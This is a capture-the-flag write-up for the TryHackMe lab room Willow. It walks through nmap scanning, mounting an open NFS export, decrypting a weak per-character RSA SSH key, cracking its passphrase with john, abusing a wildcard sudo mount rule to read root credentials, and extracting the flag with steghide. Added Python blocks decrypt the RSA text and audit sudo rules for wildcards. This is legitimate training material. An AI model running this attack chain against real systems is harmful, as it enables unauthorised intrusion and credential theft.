WriteUp — TryHackMe Willow
What lies under the Willow Tree?
This is a writeup for TryHackMe room Willow.
Reconnaissance
Let’s start with an nmap scan.
nmap -sC -sV -p- 10.10.27.167
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-08 17:29 EET
Nmap scan report for 10.10.27.167
Host is up (0.055s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 43:b0:87:cd:e5:54:09:b1:c1:1e:78:65:d9:78:5e:1e (DSA)
| 2048 c2:65:91:c8:38:c9:cc:c7:f9:09:20:61:e5:54:bd:cf (RSA)
| 256 bf:3e:4b:3d:78:b6:79:41:f4:7d:90:63:5e:fb:2a:40 (ECDSA)
|_ 256 2c:c8:87:4a:d8:f6:4c:c3:03:8d:4c:09:22:83:66:64 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Recovery Page
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 34203/udp6 mountd
| 100005 1,2,3 40275/tcp6 mountd
| 100005 1,2,3 48819/tcp mountd
| 100005 1,2,3 49052/udp mountd
| 100021 1,3,4 43589/tcp nlockmgr
| 100021 1,3,4 53328/tcp6 nlockmgr
| 100021 1,3,4 55118/udp nlockmgr
| 100021 1,3,4 56587/udp6 nlockmgr
| 100024 1 44274/udp6 status
| 100024 1 54815/tcp status
| 100024 1 58885/tcp6 status
| 100024 1 59124/udp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web server enumeration
On the main page there is a long string of numbers and some characters:
I upload it to CyberChef and convert it from hexdump. It seems to be an SSH private key, encrypted somehow.
Hey Willow, here's your SSH Private key -- you know where the decryption key is!
2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367 14422 26842 9450 14605 19276 2367 11339 33006 36500 4198 33781 33029 11405 5267 8600 1735 17632 16186 31131 26842 11339 8600 35734 14422 35734 8600 35670 2367 ......
14605 37438 12244 19396 19276 14422 2367 2367 2367 2367 2367 8600 1735 35734 33029 16186 28374 37248 33029 26842 16186 18410 23219 37248 11339 8600 33029 35670 8600 31131 2367 2367 2367 2367 2367
Enumerating NFS
Web server enumeration with gobuster or nikto didn’t discover anything more, so let’s look at NFS. Start by enumerating the exports:
/usr/sbin/showmount -e 10.10.27.167
Export list for 10.10.27.167:
/var/failsafe *
Then mount the share (I think the last time I mounted NFS was over 15 years ago):
sudo mount -t nfs 10.10.27.167:/var/failsafe /tmp/foo -o nolock
There is a single file; get its contents:
cat rsa_keys
Public Key Pair: (23, 37627)
Private Key Pair: (61527, 37627)
So now we have the private key and the ciphertext and need to figure out how to decrypt it. Each number on the page is one character encrypted with textbook RSA, so decryption with the private key (d, n) is simply character = c^d mod n per block. Time for a small Python script:
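The decryption step, as an added example and not the writeup’s own script: it turns the space-separated blocks back into characters with the private pair from rsa_keys, and it also shows that the public pair alone is enough to recover d, because a 16-bit modulus factors by trial division in microseconds. The key values are the page’s; the sample ciphertext is the page’s first five blocks; the function names are my own.

```python
# Added example, not the script from the writeup: textbook RSA decryption of
# the per-character ciphertext on the Willow recovery page, using the key
# pairs read from rsa_keys on the NFS export. Needs Python 3.8+ (pow(e, -1, m)).
from math import isqrt

E, N = 23, 37627   # Public Key Pair (e, n) from rsa_keys
D = 61527          # Private Key Pair (d, n) from rsa_keys

# Constructed sample: the first five blocks of the page's ciphertext. Every
# block is one character c = m^e mod n, so the key file's numbers recover it.
SAMPLE_CIPHERTEXT = "2367 2367 2367 2367 2367"


def decrypt_blocks(ciphertext, d=D, n=N):
    """Decrypt space-separated integer blocks, one character per block."""
    out = []
    for token in ciphertext.split():
        m = pow(int(token), d, n)          # m = c^d mod n
        if m > 127:
            # A wrong d or n yields values that are not ASCII; fail loudly
            # rather than emit garbage that merely looks like a key.
            raise ValueError(f"block {token} decrypts to {m}, not ASCII: wrong key?")
        out.append(chr(m))
    return "".join(out)


def encrypt_text(plaintext, e=E, n=N):
    """The forward direction used to build the page: c = ord(ch)^e mod n."""
    return " ".join(str(pow(ord(ch), e, n)) for ch in plaintext)


def factor_modulus(n):
    """Trial-divide n into (p, q). A 16-bit modulus falls instantly, which is
    why per-character RSA with such a key offers no confidentiality at all."""
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("n is prime or 1, not an RSA modulus")


def recover_private_exponent(e, n):
    """Derive d from the public key alone via phi(n) = (p-1)(q-1)."""
    p, q = factor_modulus(n)
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    print(decrypt_blocks(SAMPLE_CIPHERTEXT))              # -----
    p, q = factor_modulus(N)
    d_rec = recover_private_exponent(E, N)
    # rsa_keys gives d = 61527; the recovered value is the same exponent
    # modulo phi(n), so both decrypt identically.
    print(p, q, d_rec, (D - d_rec) % ((p - 1) * (q - 1)) == 0)
    print(decrypt_blocks(encrypt_text("Proc-Type: 4,ENCRYPTED"), d_rec))
```

Feed the full block list from the page to decrypt_blocks and write the result to a file; the output is the PEM-armoured, passphrase-protected key that the next step cracks.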
That yields us an RSA key, but it’s protected by a passphrase. Let’s crack it:
/usr/share/john/ssh2john.py rsa_key > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
And now we can log in to the server. The flag is in a file called user.jpg. I leave it as an exercise to figure out how to extract the flag from that file.
Privesc
sudo -l
Matching Defaults entries for willow on willow-tree:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User willow may run the following commands on willow-tree:
(ALL : ALL) NOPASSWD: /bin/mount /dev/*
OK, a quite specific command with no clear exploit in GTFOBins. Maybe we really need to mount something? What block devices are there?
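A defender-side check, added here and not part of the writeup: it parses lines in the format `sudo -l` prints and flags the pattern this box relies on, a NOPASSWD rule whose command argument is a shell wildcard. The rule regex, the finding labels and the non-mount sample rules are my own constructions.

```python
# Added example (not part of the writeup): a defender-side audit of sudo
# rules as "sudo -l" prints them, flagging the pattern the Willow box relies
# on: a NOPASSWD rule whose argument is a shell wildcard. "/bin/mount /dev/*"
# permits mounting any device node, not only the one the admin intended.
import re

# Constructed sample in "sudo -l" output format. The mount line is the rule
# from the box; the Defaults lines and the other rules are made up for contrast.
SAMPLE_SUDO_OUTPUT = """\
Matching Defaults entries for willow on willow-tree:
    env_reset, mail_badpass
User willow may run the following commands on willow-tree:
    (ALL : ALL) NOPASSWD: /bin/mount /dev/*
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (ALL) /usr/bin/less /var/log/*
"""

# One rule: "(runas) TAG: TAG: /path/to/command args..." or "(runas) ALL".
RULE_RE = re.compile(
    r"^\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<command>ALL|/\S+)"
    r"(?P<args>.*)$"
)

WILDCARD_CHARS = set("*?[")


def parse_rule(line):
    """Return a dict for a sudo rule line, or None for any other line."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    return {
        "runas": m.group("runas").strip(),
        "tags": set(re.findall(r"[A-Z_]+(?=:)", m.group("tags"))),
        "command": m.group("command"),
        "args": m.group("args").strip(),
    }


def audit_sudo_rules(text):
    """Scan sudo -l output and return the rules worth a second look."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        has_wildcard = any(ch in WILDCARD_CHARS for ch in rule["args"])
        if rule["command"] == "ALL":
            reason = "unrestricted command"
        elif has_wildcard and "NOPASSWD" in rule["tags"]:
            reason = "NOPASSWD with wildcard argument"
        elif has_wildcard:
            reason = "wildcard argument"
        else:
            continue
        findings.append({**rule, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_OUTPUT):
        print(f"{f['reason']:32} {f['command']} {f['args']}")
```

This is a heuristic over `sudo -l` text, not a sudoers parser: rules that use Cmnd_Alias or sudoedit still need reading by hand, and the fix on the host side is to name the exact device node (or a dedicated mount unit) instead of a glob.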
ls -la /dev | grep -e "^b"
brw-rw---- 1 root disk 202, 5 Nov 9 14:20 hidden_backup
brw-rw---- 1 root disk 202, 0 Nov 9 14:20 xvda
brw-rw---- 1 root disk 202, 1 Nov 9 14:20 xvda1
brw-rw---- 1 root disk 202, 2 Nov 9 14:20 xvda2
brw-rw---- 1 root disk 202, 3 Nov 9 14:20 xvda3
brw-rw---- 1 root disk 202, 112 Nov 9 14:20 xvdh
OK, one device sticks out. Let’s mount it:
sudo mount /dev/hidden_backup /tmp/bar
Then navigate to the mount point and dump the only file:
cat creds.txt
root:__REDACTED__
willow:__REDACTED__
So we can log in as root. BOOM! But where is my flag:
cat root.txt
This would be too easy, don't you think? I actually gave you the root flag some time ago.
You've got my password now -- go find your flag!
This one was quite an easy guess: run steghide on the user.jpg file with the root password:
steghide extract -sf user.jpg
Enter passphrase:
wrote extracted data to "root.txt".
That’s all folks!